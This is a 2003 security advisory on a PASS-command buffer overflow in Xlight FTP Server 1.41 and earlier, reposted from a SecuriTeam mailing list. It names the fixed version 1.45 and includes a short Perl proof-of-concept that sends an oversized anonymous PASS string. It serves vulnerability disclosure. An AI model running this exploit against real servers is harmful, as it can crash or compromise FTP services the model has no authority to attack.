Xlight FTP Server Buffer Overflow in PASS Command May Let Remote Authenticated Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1008544 |
|
SecurityTracker URL: http://securitytracker.com/id/1008544
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Dec 23 2003
|
Impact:
Execution of arbitrary code via network, User access via network
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 1.41 and prior
|
Description:
A buffer overflow vulnerability was reported in Xlight FTP Server. A remote authenticated user may be able to execute arbitrary code.
SecuriTeam reported that a remote authenticated user, including an anonymous user, can send a specially crafted PASS command to trigger a buffer overflow. The report did not specifically indicate if code execution has been confirmed or not.
STORM at SecurITeam is credited with discovery.
|
Impact:
A remote user may be able to cause arbitrary code to be executed (but the report did not confirm whether code execution is possible or not).
|
Solution:
The vendor has released a fixed version (1.45), available at:
http://www.xlightftpd.com/download.htm
|
Vendor URL: www.xlightftpd.com/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: 22 Dec 2003 14:04:50 +0200
Subject: [NT] Xlight FTP Server PASS Buffer Overflow
|
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Xlight FTP Server PASS Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://www.xlightftpd.com/> Xlight FTP server is "a powerful ftp server
with very small program size". A buffer overflow vulnerability in the
product has been found allowing remote attackers to overflow an internal
buffer.
DETAILS
Vulnerable systems:
* Xlight FTP Server version 1.41 and prior
Immune systems:
* Xlight FTP Server version 1.45
By sending an overflow long PASS command a local buffer used in Xlight FTP
server can be overflowed.
Vendor status:
"We would like to inform you that we have release a new version of Xlight
ftp server 1.45 which includes solution for this buffer overflow problem.
Thanks for your alert.
Best regards,
Xlight ftp support
support@xlightftpd.com"
Exploit:
#!/usr/bin/perl
#
# Exploit for Xlight FTP server long PASS vulnerability
#
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "ftp(21)",
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }
$remote->autoflush(1);
print $remote "USER anonymous\r\n";
sleep(1);
$buf = "A"x54; # Min 54, Max 523
print $remote "PASS ".$buf."\r\n";
sleep(1);
close $remote;
ADDITIONAL INFORMATION
SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
finding this vulnerability.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
profits or special damages.
|
|
